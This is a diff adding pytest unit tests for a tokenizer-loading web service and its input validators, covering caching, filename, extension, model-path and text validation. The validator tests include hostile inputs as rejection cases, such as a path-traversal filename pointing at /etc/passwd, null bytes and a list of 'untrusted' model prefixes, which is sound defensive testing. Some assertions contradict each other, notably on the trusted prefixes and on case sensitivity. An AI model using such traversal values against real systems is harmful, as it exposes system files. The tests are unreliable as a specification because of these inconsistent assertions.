+ broken_tokenizer.vocab_size = property(Mock(side_effect=Exception("Test error")))
60
+
61
+ info = self.service.get_tokenizer_info(broken_tokenizer)
62
+
63
+ assert 'error' in info
64
+ assert 'Test error' in info['error']
65
+
66
+ @patch('app.services.tokenizer_service.AutoTokenizer')
67
+ def test_load_predefined_tokenizer_success(self, mock_auto_tokenizer, mock_tokenizer):
68
+ """Test successful loading of predefined tokenizer."""
69
+ mock_auto_tokenizer.from_pretrained.return_value = mock_tokenizer
70
+
71
+ tokenizer, info, error = self.service.load_tokenizer('gpt2')
72
+
73
+ assert tokenizer is not None
74
+ assert error is None
75
+ assert isinstance(info, dict)
76
+ mock_auto_tokenizer.from_pretrained.assert_called_once()
77
+
78
+ @patch('app.services.tokenizer_service.AutoTokenizer')
79
+ def test_load_tokenizer_failure(self, mock_auto_tokenizer):
80
+ """Test tokenizer loading failure."""
81
+ mock_auto_tokenizer.from_pretrained.side_effect = Exception("Failed to load")
82
+
83
+ tokenizer, info, error = self.service.load_tokenizer('gpt2')
84
+
85
+ assert tokenizer is None
86
+ assert error is not None
87
+ assert "Failed to load" in error
88
+
89
+ def test_load_nonexistent_predefined_model(self):
90
+ """Test loading non-existent predefined model."""
91
+ tokenizer, info, error = self.service.load_tokenizer('nonexistent-model')
92
+
93
+ assert tokenizer is None
94
+ assert error is not None
95
+ assert "not found" in error.lower()
96
+
97
+ @patch('app.services.tokenizer_service.AutoTokenizer')
98
+ @patch('time.time')
99
+ def test_custom_tokenizer_caching(self, mock_time, mock_auto_tokenizer, mock_tokenizer, app):
100
+ """Test custom tokenizer caching behavior."""
101
+ with app.app_context():
102
+ mock_time.return_value = 1000.0
103
+ mock_auto_tokenizer.from_pretrained.return_value = mock_tokenizer
104
+
105
+ # First load
106
+ tokenizer1, info1, error1 = self.service.load_tokenizer('custom/model')
107
+
108
+ # Second load (should use cache)
109
+ mock_time.return_value = 1500.0 # Still within cache time
110
+ tokenizer2, info2, error2 = self.service.load_tokenizer('custom/model')
111
+
112
+ # Should only call from_pretrained once
113
+ assert mock_auto_tokenizer.from_pretrained.call_count == 1
114
+ assert tokenizer1 is tokenizer2
115
+
116
+ @patch('app.services.tokenizer_service.AutoTokenizer')
117
+ @patch('time.time')
118
+ def test_custom_tokenizer_cache_expiration(self, mock_time, mock_auto_tokenizer, mock_tokenizer, app):
119
+ """Test custom tokenizer cache expiration."""
120
+ with app.app_context():
121
+ mock_time.return_value = 1000.0
122
+ mock_auto_tokenizer.from_pretrained.return_value = mock_tokenizer
123
+
124
+ # First load
125
+ self.service.load_tokenizer('custom/model')
126
+
127
+ # Second load after cache expiration
128
+ mock_time.return_value = 5000.0 # Beyond cache expiration
129
+ self.service.load_tokenizer('custom/model')
130
+
131
+ # Should call from_pretrained twice
132
+ assert mock_auto_tokenizer.from_pretrained.call_count == 2
133
+
134
+ def test_tokenizer_models_constant(self):
135
+ """Test that TOKENIZER_MODELS contains expected models."""
136
+ models = self.service.TOKENIZER_MODELS
137
+
138
+ assert isinstance(models, dict)
139
+ assert len(models) > 0
140
+
141
+ # Check that each model has required fields
142
+ for model_id, model_info in models.items():
143
+ assert isinstance(model_id, str)
144
+ assert isinstance(model_info, dict)
145
+ assert 'name' in model_info
146
+ assert 'alias' in model_info
147
+ assert isinstance(model_info['name'], str)
148
+ assert isinstance(model_info['alias'], str)
149
+
150
+ def test_cache_initialization(self):
151
+ """Test that caches are properly initialized."""
152
+ service = TokenizerService()
153
+
154
+ assert hasattr(service, 'tokenizers')
155
+ assert hasattr(service, 'custom_tokenizers')
156
+ assert hasattr(service, 'tokenizer_info_cache')
157
+
158
+ assert isinstance(service.tokenizers, dict)
159
+ assert isinstance(service.custom_tokenizers, dict)
160
+ assert isinstance(service.tokenizer_info_cache, dict)
161
+
162
+ def test_special_tokens_filtering(self, mock_tokenizer):
163
+ """Test that only valid special tokens are included."""
164
+ # Add some None and empty special tokens
165
+ mock_tokenizer.pad_token = '<pad>'
166
+ mock_tokenizer.eos_token = '</s>'
167
+ mock_tokenizer.bos_token = None
168
+ mock_tokenizer.sep_token = ''
169
+ mock_tokenizer.cls_token = ' ' # Whitespace only
170
+ mock_tokenizer.unk_token = '<unk>'
171
+ mock_tokenizer.mask_token = '<mask>'
172
+
173
+ info = self.service.get_tokenizer_info(mock_tokenizer)
174
+ special_tokens = info['special_tokens']
175
+
176
+ # Should only include non-None, non-empty tokens
177
+ assert 'pad_token' in special_tokens
178
+ assert 'eos_token' in special_tokens
179
+ assert 'unk_token' in special_tokens
180
+ assert 'mask_token' in special_tokens
181
+
182
+ # Should not include None or empty tokens
183
+ assert 'bos_token' not in special_tokens
184
+ assert 'sep_token' not in special_tokens
185
+ assert 'cls_token' not in special_tokens
tests/test_validators.py ADDED
@@ -0,0 +1,256 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """
2
+ Unit tests for Validators utility
3
+ """
4
+ import pytest
5
+ from app.utils.validators import Validators, ValidationError
6
+
7
+
8
+ class TestValidators:
9
+ """Test cases for Validators utility."""
10
+
11
+ def setup_method(self):
12
+ """Set up test fixtures."""
13
+ self.validators = Validators()
14
+
15
+ def test_validate_filename_valid(self):
16
+ """Test filename validation with valid filenames."""
17
+ # Valid filenames should not raise
18
+ self.validators.validate_filename('test.txt')
19
+ self.validators.validate_filename('document.md')
20
+ self.validators.validate_filename('script_file.py')
21
+ self.validators.validate_filename('My Document.txt')
22
+ self.validators.validate_filename('file-name.json')
23
+ self.validators.validate_filename('data123.csv')
24
+
25
+ def test_validate_filename_invalid(self):
26
+ """Test filename validation with invalid filenames."""
27
+ # Empty or None filename
28
+ with pytest.raises(ValidationError):
29
+ self.validators.validate_filename('')
30
+
31
+ with pytest.raises(ValidationError):
32
+ self.validators.validate_filename(None)
33
+
34
+ # Dangerous characters
35
+ with pytest.raises(ValidationError):
36
+ self.validators.validate_filename('../../../etc/passwd')
37
+
38
+ with pytest.raises(ValidationError):
39
+ self.validators.validate_filename('file\\with\\backslashes.txt')
40
+
41
+ # Null bytes
42
+ with pytest.raises(ValidationError):
43
+ self.validators.validate_filename('file\x00.txt')
44
+
45
+ # Control characters
46
+ with pytest.raises(ValidationError):
47
+ self.validators.validate_filename('file\x01\x02.txt')
48
+
49
+ # Reserved names on Windows
50
+ with pytest.raises(ValidationError):
51
+ self.validators.validate_filename('CON.txt')
52
+
53
+ with pytest.raises(ValidationError):
54
+ self.validators.validate_filename('PRN.txt')
55
+
56
+ with pytest.raises(ValidationError):
57
+ self.validators.validate_filename('AUX.txt')
58
+
59
+ def test_validate_file_extension_valid(self):
60
+ """Test file extension validation with valid extensions."""
61
+ allowed_extensions = {'.txt', '.md', '.py', '.js', '.json'}
62
+
63
+ # Valid extensions should not raise
64
+ self.validators.validate_file_extension('test.txt', allowed_extensions)
65
+ self.validators.validate_file_extension('document.md', allowed_extensions)
66
+ self.validators.validate_file_extension('script.py', allowed_extensions)
67
+ self.validators.validate_file_extension('data.json', allowed_extensions)
68
+
69
+ # Case insensitive
70
+ self.validators.validate_file_extension('FILE.TXT', allowed_extensions)
71
+ self.validators.validate_file_extension('Document.MD', allowed_extensions)
72
+
73
+ def test_validate_file_extension_invalid(self):
74
+ """Test file extension validation with invalid extensions."""
75
+ allowed_extensions = {'.txt', '.md', '.py'}
76
+
77
+ # Invalid extensions should raise
78
+ with pytest.raises(ValidationError):
79
+ self.validators.validate_file_extension('virus.exe', allowed_extensions)
80
+
81
+ with pytest.raises(ValidationError):
82
+ self.validators.validate_file_extension('archive.zip', allowed_extensions)
83
+
84
+ with pytest.raises(ValidationError):
85
+ self.validators.validate_file_extension('image.jpg', allowed_extensions)
86
+
87
+ # No extension
88
+ with pytest.raises(ValidationError):
89
+ self.validators.validate_file_extension('filename', allowed_extensions)
90
+
91
+ # Empty filename
92
+ with pytest.raises(ValidationError):
93
+ self.validators.validate_file_extension('', allowed_extensions)
94
+
95
+ def test_validate_model_path_valid(self):
96
+ """Test model path validation with valid paths."""
97
+ # Valid HuggingFace model paths
98
+ valid_paths = [
99
+ 'microsoft/DialoGPT-medium',
100
+ 'google/bert-base-uncased',
101
+ 'meta-llama/Llama-2-7b-hf',
102
+ 'mistralai/Mistral-7B-Instruct-v0.1',
103
+ 'Qwen/Qwen2.5-72B-Instruct',
104
+ 'THUDM/chatglm-6b',
105
+ 'deepseek-ai/deepseek-coder-6.7b-base',
106
+ 'unsloth/llama-2-7b-bnb-4bit',
107
+ 'google-bert/bert-base-uncased',
108
+ 'bartar/SPLM-2' # User's specific case
109
+ ]
110
+
111
+ for path in valid_paths:
112
+ self.validators.validate_model_path(path) # Should not raise
113
+
114
+ def test_validate_model_path_invalid_format(self):
115
+ """Test model path validation with invalid formats."""
116
+ # Invalid formats should raise
117
+ invalid_paths = [
118
+ '', # Empty
119
+ 'invalid-path', # No slash
120
+ 'user/', # Empty model name
121
+ '/model-name', # Empty user
122
+ 'user//model', # Double slash
123
+ 'user/model/extra', # Too many parts
124
+ 'user name/model', # Space in user
125
+ 'user/model name', # Space in model (actually this might be valid)
126
+ 'user@domain/model', # Invalid characters
127
+ '../malicious/path', # Path traversal
128
+ 'user\\model', # Backslash
129
+ ]
130
+
131
+ for path in invalid_paths:
132
+ with pytest.raises(ValidationError):
133
+ self.validators.validate_model_path(path)
134
+
135
+ def test_validate_model_path_untrusted_prefix(self):
136
+ """Test model path validation with untrusted prefixes."""
137
+ # Paths with untrusted prefixes should raise
138
+ untrusted_paths = [
139
+ 'random-user/some-model',
140
+ 'untrusted/malicious-model',
141
+ 'hacker/backdoor-model',
142
+ 'suspicious/model'
143
+ ]
144
+
145
+ for path in untrusted_paths:
146
+ with pytest.raises(ValidationError):
147
+ self.validators.validate_model_path(path)
148
+
149
+ def test_validate_model_path_edge_cases(self):
150
+ """Test model path validation edge cases."""
151
+ # None input
152
+ with pytest.raises(ValidationError):
153
+ self.validators.validate_model_path(None)
154
+
155
+ # Very long path
156
+ long_path = 'microsoft/' + 'a' * 1000
157
+ with pytest.raises(ValidationError):
158
+ self.validators.validate_model_path(long_path)
159
+
160
+ # Special characters in allowed prefix
161
+ self.validators.validate_model_path('microsoft/model-with-dashes')
162
+ self.validators.validate_model_path('microsoft/model_with_underscores')
163
+ self.validators.validate_model_path('microsoft/model.with.dots')
164
+
165
+ def test_validate_text_input_valid(self):
166
+ """Test text input validation with valid inputs."""
167
+ # Valid text inputs should not raise
168
+ self.validators.validate_text_input('Hello world!')
169
+ self.validators.validate_text_input('A' * 1000) # Long but reasonable text
170
+ self.validators.validate_text_input('Text with\nnewlines\nand\ttabs')
171
+ self.validators.validate_text_input('Unicode: 你好世界 🌍')
172
+ self.validators.validate_text_input('') # Empty text might be valid
173
+
174
+ def test_validate_text_input_invalid(self):
175
+ """Test text input validation with invalid inputs."""
176
+ # None input
177
+ with pytest.raises(ValidationError):
178
+ self.validators.validate_text_input(None)
179
+
180
+ # Extremely long text (if there's a limit)
181
+ very_long_text = 'A' * (10 * 1024 * 1024) # 10MB of text
182
+ with pytest.raises(ValidationError):
183
+ self.validators.validate_text_input(very_long_text)
184
+
185
+ def test_validate_text_input_malicious_content(self):
186
+ """Test text input validation with potentially malicious content."""
187
+ # Null bytes
188
+ with pytest.raises(ValidationError):
189
+ self.validators.validate_text_input('text\x00with\x00nulls')
190
+
191
+ # Control characters (some might be allowed like \n, \t)
192
+ try:
193
+ self.validators.validate_text_input('text\x01with\x02controls')
194
+ except ValidationError:
195
+ pass # This might be expected
196
+
197
+ def test_validation_error_messages(self):
198
+ """Test that ValidationError contains meaningful messages."""
199
+ # Test filename validation error message
200
+ try:
201
+ self.validators.validate_filename('../../../etc/passwd')
202
+ assert False, "Should have raised ValidationError"
203
+ except ValidationError as e:
204
+ assert 'filename' in str(e).lower() or 'path' in str(e).lower()
205
+
206
+ # Test file extension error message
207
+ try:
208
+ self.validators.validate_file_extension('virus.exe', {'.txt'})
209
+ assert False, "Should have raised ValidationError"
210
+ except ValidationError as e:
211
+ assert 'extension' in str(e).lower() or 'allowed' in str(e).lower()
212
+
213
+ # Test model path error message
214
+ try:
215
+ self.validators.validate_model_path('invalid-path')
216
+ assert False, "Should have raised ValidationError"
217
+ except ValidationError as e:
218
+ assert 'model' in str(e).lower() or 'path' in str(e).lower()
219
+
220
+ def test_allowed_model_prefixes_coverage(self):
221
+ """Test that all common model prefixes are covered."""
222
+ # This test ensures we have good coverage of trusted model prefixes
223
+ common_prefixes = [
224
+ 'microsoft/',
225
+ 'google/',
226
+ 'meta-llama/',
227
+ 'mistralai/',
228
+ 'openai-community/',
229
+ 'Qwen/',
230
+ 'THUDM/',
231
+ 'deepseek-ai/',
232
+ 'unsloth/',
233
+ 'google-bert/'
234
+ ]
235
+
236
+ for prefix in common_prefixes:
237
+ # Should be able to validate models with these prefixes
238
+ test_path = prefix + 'test-model'
239
+ try:
240
+ self.validators.validate_model_path(test_path)
241
+ except ValidationError:
242
+ pytest.fail(f"Trusted prefix {prefix} should be allowed")
243
+
244
+ def test_case_sensitivity(self):
245
+ """Test case sensitivity in various validations."""
246
+ # File extensions should be case insensitive
247
+ allowed_extensions = {'.txt', '.md'}
248
+ self.validators.validate_file_extension('FILE.TXT', allowed_extensions)
249
+ self.validators.validate_file_extension('Document.MD', allowed_extensions)
250
+
251
+ # Model path prefixes should be case sensitive (HuggingFace convention)
252
+ self.validators.validate_model_path('Microsoft/model') # Capital M
253
+
254
+ # But random capitalization in untrusted prefixes should still fail
255
+ with pytest.raises(ValidationError):
256
+ self.validators.validate_model_path('RANDOM/model')